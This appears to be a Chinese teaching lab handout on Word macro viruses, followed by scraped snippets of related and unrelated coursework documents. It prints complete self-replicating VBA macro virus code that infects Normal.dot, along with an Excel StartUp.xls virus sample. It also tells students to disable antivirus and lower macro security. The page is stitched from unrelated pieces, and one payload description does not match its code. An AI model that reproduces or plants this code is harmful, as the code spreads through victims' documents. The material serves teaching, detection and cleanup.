实验七 计算机宏病毒分析及清除实验
实验七计算机宏病毒分析及清除实验
一、实验目的
?了解“宏病毒”机理;
?掌握清除宏病毒的方法;
?掌握采用“宏”和脚本语言进行编程的技术。
二、实验时数:2小时
三、实验环境
?Windows 2000/2003/XP或更高级别的Windows操作系统;
?Office Word 2000/2003等字处理软件。
四、实验要求
?演示宏的编写;
?理解宏病毒的作用机制。
五、实验步骤:
1.软件设置
关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。
注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
2.自我复制功能演示
打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
完整代码如下:
'Macro-1:Micro-Virus
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 2, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
MsgBox "MicroVirus by Content Security Lab"
End Sub
以上代码的基本执行流程如下:
1) 进行必要的自我保护:
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。
本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给用户提示。
2) 得到当前文档的代码对象和公用模板的代码对象:
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
3) 检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名:
With Host
If .Lines(1.1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, Ourcode
.ReplaceLine 2, "Sub Document_Close()"
If ThisDocument = nomaltemplate Then
.ReplaceLine 2, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
4) 执行恶意代码
MsgBox "MicroVirus by Content Security Lab"
3.具有一定破坏性的宏
我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在word 2000/2003版本中运行,且降低破坏性,对源代码作适当修改,参见如下源代码(Macro_2)。
完整代码如下:
'Macro_2:moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If
With host
If .Lines(1, 1) <> "'moonlight" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 3, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Year(Now()) = 2013 Then
try:
On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm(i) = Int(Rnd() * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i
beg:
Beep
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents.Add
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Beep
With Selection.Font
.Name = "细明体"
.Size = 16
.Bold = 1
.Underline = 1
End With
Selection.InsertAfter Text:="何谓宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="我就是......"
Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic = 0
Beep
Selection.InsertAfter Text:="如何预防宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="不要看我......"
GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents.Add
Next j
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Selection.InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If
Wend
End If
out:
End Sub
该病毒的效果:当打开被感染的word文档时,首先进行自我复制,感染word 模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:我就是......
如何预防宏病毒
答案:不要看我......
如果计算错误,新建20个写有“宏病毒”字样的word文档,然后再一次进行心算游戏,总共进行3次,然后跳出程序。关闭文档的时候也会执行同样的询问。
4.清除宏病毒
对每一个受感染的word文档进行如下操作:
打开受感染的word文档,进入宏编辑环境(Alt+F11),打开“Normal Microsoft Word”对象“This Document”,清除其中的病毒代码(只要删除所有内容即可)。
然后打开“Project”“Microsoft Word”“This Document”,清除其中的病毒代码。
实际上,模板的病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其他已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查看每一个受感染文档的模板,如果存在病毒代码,都进行一次清除。
六、实验报告:
根据实验步骤,记录每一步实验结果,并撰写实验报告。
附:相关知识点
1.宏
宏是一系列命令和指令组合在一起形成的一个命令。以实现任务执行的自动化。Lotus 、Office等都可以使用宏。
?宏的创建
以微软Office中的Word为例。它提供两种宏创建方法:宏录制器和VB编辑器。方法是:运行word,单击“工具”→“宏”,选择“宏录制”或“VB编辑器”就可以创建宏。
?宏的保存
宏可以保存到模板或文档中,默认情况下,Word将宏存储在文件名
Normal.dot的模板中,该模板中的宏可以被所有Word文档使用。
?Word模板
Word模板是微软为方便Word使用集成在Word中的各种类型文档的一般模式。如传真、报告、通信录模板等等。此外,Word还允许用户在模板中添加自己定义的宏。使用户在制作自己的特定格式文件时,减少重复劳动。
任何一个Word文件都有相应的模板对应,而在所有模板中,最常用的就是Normal.dot模板(通用模板),它是启动Word时载入的默认模板。当打开或建立大多数Word文档时,系统都会自动装入Normal.dot模板并执行其中的宏。
?自动宏
自动宏是Word自动执行的宏。当Word打开文件时,首先检查是否有自动宏存在,如有,就自动启动它。Word宏病毒至少包含一个以上的自动宏,当Word 启动时,宏病毒程序也自动执行。
常见的自动宏有:
AutoNew:每次生成新文档时调用。
AutoOpen:每次打开一个已有文档时调用
AutoClose:每次关闭一个文档时调用
AutoExit:每次退出Word时调用
AutoExec:启动Word时调用
Document_Close:文档关闭时调用
FileSaveAs:文件另存时调用
FileSave:文件保存时调用
FileOpen:文件打开时调用
宏病毒通常是通过这些自动宏来扩散。
2.宏病毒
宏病毒(Macro Virus)是一种利用应用程序宏语言编制的计算机病毒,它附着在某个文件上,当用户打开这个文件时,宏病毒就被激活,并产生连锁性的感染。
针对MS Word的宏病毒通常感染Word的DOT模板文件,尤其是Normal.dot 文件,该文件是系统中大部分文档和字模板的基础,在系统缺省状态下该模板文件首先被打开,如果Normal.dot文件被病毒感染,当它被打开时,病毒就会扩散
到其他文档和模板。宏病毒迫使正在编辑的文档以指定模板格式存盘,以便进行传播。因为宏病毒无法附着在标准格式的DOC文件中,只有文档模板可以存储实际的宏代码,从而作为病毒载体。
宏病毒自从1995年出现第一例以来,已经出现或变异成了上百种宏病毒,1996年出现了5种宏病毒,其破坏性已经从良性发展到恶性。随着MS Office和Word 软件的用户越来越多,以Word文档格式交换的数据文件也越来越多,从而使宏病毒的传染可能性增大。
宏病毒的传染驻留机理是利用了Word给用户提供的一项强大功能,即用户可以自我增加Word功能,在工具菜单中加入宏程序。宏程序采用WordBasic语言编写,自动嵌入系统文件中。宏病毒编制机理的公开,始自于一个名为Joel McNamara 的人,他通过Internet网络的主题新闻组和电子公告牌系统,展示了他的一篇文章,详细阐述了计算机文档、电子邮件以及OLE环境的安全脆弱性,阐述了采用宏编写特殊程序(病毒)的可能性和文档,并在文档末尾公开了他编写的完整的、带注释的源程序DMV(Document Macro Virus),这个文档本身有意感染上了病毒,而这个源程序则成为以后那些别有用心的人编制宏病毒的教材和示例。当然,一切有理智的人和反病毒协会都强烈谴责这种无限制公开发表病毒源程序的做法,因为后来出现的很多宏病毒都是按照此方法编写的。DMV病毒则成为第一个宏病毒,它采用一个宏AutoClose,在文档关闭时这个宏自动执行,并显示一个消息框,解释它所完成的所有动作。
常见的宏病毒如下:
1) “概念”(Concept)病毒
“概念”病毒使用5个宏(macro)进行感染和传播,这5个宏是AAAZAO,AAAZFS,AutoOpen,FileSaveAs, PayLoad,在菜单Tool/Macro项中可以看到这几个宏。该病毒传染时首先检查系统中是否存在PayLoad或FileSaveAs宏,如果两者之一存在,病毒会中止传染过程,否则开始进行传染。传染开始时,屏幕上将显示一个对话框,其中有一个数字和一个OK按钮,当用户按下OK按钮,病毒体被激发启动。病毒体运行后替换菜单中File/SaveAs功能,迫使用户以后将所有文档文件都改存为新的模板文件,同时将宏AAAZAO中的内容放入新模板文件的AutoOpen宏中,将宏AAAZFS,AAAZAO和Payload复制到新文件中。这样,用
户每次打开模板时AutoOpen宏都自动执行,病毒也就被复制到新的文件中。
对于“概念”病毒的检查,可以通过上述几种特殊宏的存在判定,其中,在宏PayLoad中存在字符串“That's enough to prove my point”(足够证明我的话了)。
2)“核子”(Nuclear)病毒
“核子”病毒类似“概念”病毒采用9个宏进行感染传播,这些宏是AutoExec,AutoOpen,DropSuriv,FileExit,FilePrint,FilePrintDefault,FileSa veAs,InsertPayLoad,PayLoad,上述宏操作都具有“只执行”(ExecuteOnly)功能,从而被MS Word系统自动加密,因此,检查时可以列出这些宏,但不能对他们进行编辑。该病毒具有三种传染方式,第一种是当感染病毒的文档或者模板被打开时,病毒通过自动运行AutoOpen而启动,首先检查AutoExec宏的存在,如果存在,病毒会中止传染;否则将病毒宏代码复制到全局模板上,然后判别系统日期是否是4月5日,如果是则病毒发作,将改变硬盘上DOS系统文件C:.SYS, MSDOS.SYS和https://www.360docs.net/doc/7810174850.html,的属性,然后删除C:.COM文件。第二种传染方式是在非发作日期用户编辑文档时,病毒将通过SaveAs宏把全局模板中的所有病毒宏都复制到新创建的文件中,并强制将文档存储为模板格式,使病毒宏代码附着在文件中。第三种传染方式是利用AutoExec宏传染,MS Word在开始自动执行并检查到AutoExec宏不存在时,已把所有病毒代码复制到全局模板中,在判定日期的同时也判定系统时间,如果时间处于下午5:00~5:59之间,这个宏会采用debug例程在C:目录中建立一个二进制病毒代码ph33r,该病毒为自我复制型,它可以感染所有COM和EXE文件(包括DOS和Windows的可执行文件),从而驻留在磁盘上。当此代码进入内存并运行传染后,这个宏将删除所有的感染例程。该病毒的特征信息仅在系统打印时表现,时间也必须在每分钟的最后4秒(56--59秒),在这段时间里打印已经感染的Word文件时,“核子”病毒会在打印最后一页加上字符串:“And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACFIC!”。
3)“彩色”(Colors)病毒
该病毒也称为“彩虹”(RainBow)病毒,传染机制类似,即将文档存为模板,在其中夹带病毒宏代码,它也通过AutoOpen和SaveAs传染,也使用了9个自动
宏,也已经加密而不能编辑。该病毒进行任何一次宏调用,就将一个计数器加1,该计数器被存放在Win.ini文件中的[windows]项下,入口为Countersu。当计数器计满300时,病毒向Win.ini中写入随机桌面彩色值。这样,当用户下一次启动Windows系统时,桌面色彩就改变了。
4)“无政府者一号”(MDMA.A)病毒
该病毒发作时间为每月一号,由于文本文件的交换共享性,它是一种多操作系统平台病毒。当它在Windows 3.x系统中发作时,会在Autoexec.bat文件中加入一条Deltree /y C:命令,当下次启动时,彻底毁掉C盘文件。当它在Win95系统上发作时,将删除C:目录下的所有hlp文件和C:目录下的所有cpl文件。而在WinNT系统或者macintosh系统中发作时,将删除当前目录下的所有文件。当病毒破坏完成后,将显示字符串:
"You are infectedwith MDMA_DMV.
Brought to you by MDMA (Many Delinquent Modern Anarchists)"
对于这个病毒可以简单地将系统日期改动,避开每月的一号来防止发作。
5)“格式化”病毒
这个病毒只是一个“特洛依木马”,它不能也不会复制。它只采用宏AutoOpen 工作,当文档打开时自动执行,病毒发作时将对C盘无条件格式化。
宏病毒已经在个人计算机上广泛流行,别有用心者还在不断地编写新的宏病毒。为了解决宏病毒问题,微软公司推出了一个名为scanprot.dot的模板,来检测和清除这些宏病毒。此外,目前流行的宏病毒还有:“台湾一号”、“钓鱼岛”、“BANDUNG-A”、“BANDUNG-B”以及上述宏病毒的变种。
3.宏病毒的结构
宏病毒的结构主要由初始化程序、感染复制程序、显示或破坏部分组成。
?初始化:宏病毒的初始化主要用来定义变量、常量和环境。
?感染:绝大多数宏病毒使用VBE(visual basic editor)自带的对象
VBProject.VBComponents来完成宏病毒的感染。
?触发:绝大多数宏病毒以标志作为触发条件,搜索被感染对象中是否
含有设定标志,如没有,就感染它。
?破坏:宏病毒的破坏功能主要表现在影响正常的文件操作上,严重时
也会破坏文件甚至系统。
4.宏病毒本身的局限性
由于只有模板文件才能储存宏指令,所以宏病毒只能以模板文件形式传播。而Word 在存储模板文件时(Save AS/另存为时),不能选择保存类型,只能存为"文档模板" (.dot)。由此,很容易判断出一个文件是否为一个模板文件。如果是一个以.doc为后缀的模板文件,那么可以肯定的说,这是一个被染毒的文件,或者是一个"宏病毒遗体"。
6.宏病毒的清除
(1)用杀毒软件清除。
(2)用手工清除:
?单击“工具”→“宏”→“宏”打开“宏”窗口。
?单击“宏的位置”下拉条,选择“Normal.dot”,删除刚才定义的自
动宏。
7.宏病毒的防御
宏病毒的防御方法有:
?设置宏的安全级别
打开Word文档→“工具”→“宏”→“安全性”,在宏安全级别中选择“高”,在“可靠来源”项上,清除“信任所有安装的加载项和模板”选项。
?为宏添加数字签名。
打开Word文档→“工具”→“宏”→“Visual Basic 编辑器”→“工具”
→“数字签名”即可设置数字签名。
Word宏病毒
Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 2.实验所需条件和环境 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问 实验环境配置如下图所示: 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过
多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 3.1. 例1 自我复制,感染word公用模板和当前文档 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下: 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将
计算机基础实验报告(第七次)
东莞理工学院城市学院 CITY COLLEGE OF DONGGUAN UNIVERSITY OF TECHNOLOGY
实验七 Access数据库 一、实验目的: 1.理解数据库、数据库管理系统、数据库系统等概念; 2.熟悉Access 2003操作环境; 3.掌握在Access中创建数据库及表、查询、窗体、报表等对象的方法; 4.了解数据库各个对象集成的简单方法。 二、实验内容与步骤: 1.创建数据库:启动Access2003,在其中创建“学生成绩管理”数据库。 2.创建表: “学生成绩管理”数据库中有三张表,表结构如下: 表A-2 “学生信息”表(主键:学号) 表A-3 “课程”表(主键:课程编号) 表A-4 “成绩”表(主键:学号+课程编号) (1)根据表A-3用“设计器”为“学生成绩管理”数据库创建“课程”表,并输入数据(如图A-21)。
图A-21“课程”表的数据表视图 (2)将excel文件“成绩.xls”导入到数据库“学生成绩管理”中,并参照表A-4相应的修改表结构。 (3)将数据库文件“stu.mdb”中的“student”表导入到“学生成绩管理”数据库中,然后将其重命名为“学生信息”。 (4)建立表间关系,关系如下图A-22。 图A-22学生成绩管理数据库表间关系 3.创建查询: (1)用向导创建一个选择查询“学生基本信息”,包括学生信息表中的学号、姓名、性别、班级字段。 (2)用设计视图建立一个名为“不及格”的选择查询,查询所有不及格学生的学号、姓名、课程名称和成绩。 (3)用设计视图创建一名为“学生成绩查询”的参数查询,包含字段:学号,姓名、课程、成绩。当运行该查询时,弹出如图A-23所示的对话框,输入数据“宋丝丝”,按确定按钮,则弹出如图A-24所示的运行结果。其设计视图如图A-25所示。 图A-23 输入参数对话框图A-24 参数查询运行结果
宏病毒分析及清除实验
实验五宏病毒分析及清除实验 姓名:xxx 学号:xxxxxxxx 日期:2014年4月26日 专业:计算机科学与技术 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统; ?Office Word2003字处理软件。 三、实验内容 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下:
清除宏病毒
清除宏病毒,名字是:StartUp.xls方法 --大白菜 文中图片都很小,看不清楚,可以用以下快捷方式:按住ctrl 向上滚动鼠标滑轮可以放大word,就可以看清楚图片了 病毒样本如下:(下面是宏病毒代码,电脑知识欠缺的,千万被乱动哦,小心弄巧成拙) Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/7810174850.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/7810174850.html,
实验三 脚本病毒和宏病毒分析
实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1.任务性质:验证性实验 2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。 3.任务步骤: (1)打开Word2000,新建一个文档名为“test”; (2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮; (3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA; (4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”; (5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”; (6)保存并关闭“test”文档; (7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。 (8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4.示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count
郑大计算机基础实验报告册答案
习题及实验(一) 第一部分习题 一、简答题 1计算机的发展阶段: 四个发展阶段: 第一个发展阶段:1946-1956年电子管计算机的时代。1946年第一台电子计算机问世美国宾西法尼亚大 学,它由冯·诺依曼设计的。占地170平方,150KW。运算速度慢还没有人快。是计算机发展历史上的一个里程碑。(ENIAC)(electronic numerical integator and calculator)全称叫“电子数值积分和计算机”。 第二个发展阶段:1956-1964年晶体管的计算机时代:操作系统。 第三个发展阶段:1964-1970年集成电路与大规模集成电路的计算机时代 (1964-1965)(1965-1970) 第四个发展阶段:1970-现在:超大规模集成电路的计算机时代。 第一代计算机1946 1957 电子管运算速度较低,耗电量大存储容量小。 第二代计算机1958 1964 晶体管体积小,耗电量较少,运算速度高,价格下降。 第三代计算机1965 1971 中小规模集成电路体积功能进一步减少,可靠性及速度进一步提高。 第四代计算机1972年至今大规模及超大规模集成电路性能到规模提高,价格大幅度降低,广泛应用于社会生活的各个领域,走进办公室和家庭 2.主要应用:计算机的应用极其广泛,早期的计算机主要体现在科学计算机,数据处理,计算机控制等几个方面.随着微型计算机的发慌和迅速普及,计算机的应用已渗透到国民经济各个总门及社会生活的各个方面现代计算机除了传统的应用外,还应用于以下几个大方面. 1.办化自动化 2.计算机辅助系统 3.虚拟现实 4.人工智能 5.电子商务 3. 1.管理系统中的各种资源,包括硬件资源和软件资源。 1)监视资源 2)决定分配资源策略 3)分配资源 4)回收资源 2.为用户提供友好的界面。 1)命令行界面 2)图形化界面 4.操作系统大致可分为6种类型。 简单操作系统。分时系统。实时操作系统。网络操作系统。分布操作系统。智能操作系。目前微机上常见的操作系统有DOS、OS/2、UNIX、XENIX、LINUX、Windows、Netware 等。 5. 系统软件,应用软件。 系统软件:用以实现计算机系统的管理、控制、运行、维护,并完成应用程序的装入、编译等任务的程序。系统软件是开发和运行应用软件的平台,系统软件的核心是操作系统。
令人心烦的excel宏病毒终于清除了-推荐下载
令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气,脑子一下子轻松了许多。你可能不知道,为了清除这个excel宏病毒,几天来,搞得我头昏脑胀。 大约两三个星期前,同事罗某告诉我,下面报上来的excel表,打开后出现了奇怪的现象:会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒,默认打开的book1可能是excel的模板。我先“另存为”文件,找到book1的位置,删掉。同时把excel的宏安全性设置为高,禁止运行来历不明的宏,问题即解决了。 恰巧到下面去检查工作,某单位反映,电脑中病毒了,所以没有及时交表格。一问情况,与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是:如果将宏的安全性设为非常高,禁用宏,会弹出一个警告:“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”,该表打不开;如果要打开这个表,必须降低excel宏安全性等级,将它设为中或低,即运行宏病毒,但又多出了一个book1表。即使将book1删除,仍然不行。面对这个新病毒,当时我不知该怎么办。 没过两天,罗某又来找我,说又出现了一种现象。我去看了,正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且,下面有几个单位都说出现了宏病毒,上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了,引起了我的兴趣。
以前,我的电脑也多次中过病毒。我一般的做法就是上网查找 资料,把几篇文章介绍的方法结合起来,多试几次,几乎都能解决。可是这一次,情况完全不同。上网查了多次,讲宏病毒的文章特别多,但是介绍杀除方法的极少,而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子,所介绍的方法就两样,一是在Excel 2003中禁止宏,二是用杀毒软件。第一种禁止是不行的,第二种杀毒软件我用了小红伞、360安全卫士,没查出病毒。 除此之外,还有一种临时救急的方法是:打开病毒表格,复制,再新建一个表格,选择性粘贴,只选值,最后保存。这个办法虽然行,但是面对那么多有宏病毒的表格,一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢? 接下来,我的思路是选择一种不支持excel宏的电子表格软件,这 样也许就把宏病毒过滤了。我试验过的软件有:wps office 2003 到最新的2010版,Ashampoo Office 2010,OpenOffice 3.2,永中Office 2009。它们都提示发现了宏,有的说不支持,有的说可以禁用,重新保存后宏病毒仍然存在,要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格,只是在菜单栏提示“禁止了宏”,不影响操作。然而,现在基层单 位的电脑配置都比较低,安装不了Office 2007 / 2010 Beta,再说Office 2007 / 2010 Beta的菜单怪怪的,很多人不习惯。最重要的是,这并没有从根本上解决问题,宏病毒依然在表格文件里。 有个单位的人对我说,他们请来了电脑公司人员,几个小青年,把
计算机基础实验七
〈计算机信息技术基础〉实验七综合练习 一、实验内容 练习1.打开“Word练习11.doc(单击鼠标右键,在快捷菜单中选择“另存为”,可以下载该文件)”,参照样本一,进行如下操作: 样本一上部
样本一下部 1.查找与替换 将全文中的“新房子”改为“老房子”,“老房子”字形设为斜体、颜色为绿色、加粗2.设置字符、段落格式 将标题设置为二号、隶书、加粗、粉色字体,且居中,段前、段后各2行。 3.设置边框与底纹 将标题加上兰色、3磅粗、带阴影的边框,及填充色为浅兰色、图案样式为“20%”的底纹。4.设置栏格式 将第二段分成两栏,中间用竖线分隔。 5.创建水印 如样本一,从剪贴画库中插入一幅图片,并设置成水印。 6.设置页面 设置纸张大小为B5,上、下边距设为3.5厘米,左、右边距设为2.5厘米。 7.设置页眉、页码 如样本一,设置页眉为“散文集”,且在页眉的右侧插入格式为“第x页”的页号。 8.设置脚注 为标题设置脚注“*作者华明”。 9.保存文件 将此文件保存在“上机实验作业”文件夹中,文件名为“Word练习11.doc”。 练习2.绘制如样本二的表格,要求如下: 1.标题宋体、三号、粗体字,且居中。 2.其余文字为宋体、四号字,垂直居中。 3.各行高为20磅。 4.四周边框为三条细实线,内部表格线为单细实线。 5.为右下角单元格中的文字加兰色底纹。
6.保存文件 将此文件保存在“上机实验作业”文件夹中,文件名为“Word练习12.doc”。 样本二 练习3.制作如样本三的文档,要求如下: 样本三 1.插入图片 从“Microsoft剪贴画库”中选择小船图片插入到文档中,并调整好图片的大小,见样本三。2.利用艺术字制作标题 输入艺术字“我把小船划向月亮”,宋体、36号字,请按自己的爱好,调整好艺术字的形状、大小及位置,见样本三。 3.绘制图形 利用绘图工具栏绘制月亮和星星并填充颜色。
宏病毒实验报告
